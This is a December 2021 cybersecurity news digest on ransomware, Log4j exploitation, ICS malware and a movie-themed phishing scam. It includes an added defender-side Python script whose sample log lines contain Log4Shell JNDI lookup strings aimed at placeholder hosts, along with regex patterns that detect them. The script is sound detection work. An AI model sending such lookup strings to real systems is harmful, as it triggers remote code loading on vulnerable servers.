Cyware Daily Threat Intelligence, December 17, 2021

Looks like Hive ransomware is on a mission to take center stage in the ransomware landscape. The relatively new malware has emerged as the most active ransomware, adding more than 350 organizations to its list of victims in just four months. Researchers estimate the gang’s profits at millions of dollars between October and November alone.

The ongoing attacks on Apache Log4j take a new turn as hackers shift to Remote Method Invocation (RMI) to maximize the chance of success. This enables attackers to bypass additional checks and constraints put in place by security teams. In another emerging threat, a new malware dubbed PseudoManuscrypt has been found infecting thousands of ICS computers across 195 countries.

Top Breaches Reported in the Last 24 Hours

McMenamins targeted
Hotel and brewpub chain McMenamins was hit badly by Conti ransomware. The attack occurred last week, following which sensitive data belonging to employees was exposed. The company had to shut down its IT systems, PoS systems, and corporate emails to prevent the further spread of the attack.

Hive breaches over 350 organizations
Hive ransomware has managed to breach over 350 organizations since its emergence in June. The initial compromise methods of the group include phishing emails and compromised VPN credentials.

IT recruitment firm discloses attack
Finite Recruitment confirmed a cyberattack that occurred in October. This affected a small subset of the company’s data that was later published on the dark web. Among the data stolen were financial records, contracts, and customers’ personal details.
 
Top Malware Reported in the Last 24 Hours

New PseudoManuscrypt malware
A new malware dubbed PseudoManuscrypt has infected over 35,000 computers in 195 countries. At least 7% of these computers are used by organizations in the engineering, building automation, energy, manufacturing, construction, utilities, and water management sectors. The malware is distributed via pirated software installer archives.

Hackers use RMI to evade detection
Hackers exploiting the Apache Log4j vulnerability have switched from LDAP callback URLs to RMI (Remote Method Invocation) to maximize the chance of success. This enables attackers to bypass additional checks and constraints put in place by security teams, in particular rules that only look for the LDAP form of the lookup.
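A defender-side illustration of the point above, added here and not part of the Cyware brief: a log check that matches only the LDAP form of a JNDI lookup misses the same lookup sent over RMI (or any other scheme), whereas a scheme-agnostic pattern catches all of them and extracts the callback host for blocking. The log lines are constructed for the example, and the 203.0.113.x addresses are documentation placeholders.

```python
import re
from urllib.parse import urlsplit

# Constructed sample log lines (not real traffic). They mimic a web server
# writing the User-Agent header, a common place for the lookup string to land.
SAMPLE_LOGS = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.6 - - "GET / HTTP/1.1" 200 "${jndi:rmi://203.0.113.7:1099/b}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.8 - - "GET / HTTP/1.1" 200 "${jndi:dns://203.0.113.9/c}"',
]

# The narrow rule the attackers are sidestepping: it only knows about LDAP.
LDAP_ONLY = re.compile(r'\$\{jndi:ldap://', re.IGNORECASE)

# Scheme-agnostic rule: any JNDI lookup, whatever protocol follows the colon.
JNDI_ANY = re.compile(
    r'\$\{jndi:(?P<scheme>[a-z]+)://(?P<target>[^}\s"]+)', re.IGNORECASE
)


def find_jndi_lookups(line):
    """Return (scheme, host, port) for every JNDI lookup found in a log line.

    The host/port pair is what a blocklist or egress rule would act on.
    """
    hits = []
    for m in JNDI_ANY.finditer(line):
        parts = urlsplit(f"{m['scheme']}://{m['target']}")
        hits.append((m['scheme'].lower(), parts.hostname, parts.port))
    return hits


def triage(lines):
    """Count how many lines each rule flags, to show the LDAP-only gap."""
    ldap_only = sum(1 for line in lines if LDAP_ONLY.search(line))
    any_scheme = sum(1 for line in lines if JNDI_ANY.search(line))
    return {"ldap_only": ldap_only, "any_scheme": any_scheme}


if __name__ == "__main__":
    print(triage(SAMPLE_LOGS))  # the LDAP-only rule misses the RMI and DNS lines
    for line in SAMPLE_LOGS:
        for hit in find_jndi_lookups(line):
            print("callback target:", hit)
```

The gap between the two counts is exactly the set of lookups that an LDAP-only detection leaves invisible.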

Top Vulnerabilities Reported in the Last 24 Hours

VMware announces patches
VMware announced the release of patches for a critical SSRF vulnerability in the Workspace ONE UEM console. Tracked as CVE-2021-22054, the flaw can allow attackers to access sensitive data in the management console.

Top Scams Reported in the Last 24 Hours

Scammers leverage newly released movie
Phishers are leveraging the latest Spider-Man movie to spread malicious files and phishing pages. The phishing pages purport to stream the movie online, and users are asked to register their name and enter their credit card details. The victim’s card is charged, and they never get to watch the movie.


Posted on: December 17, 2021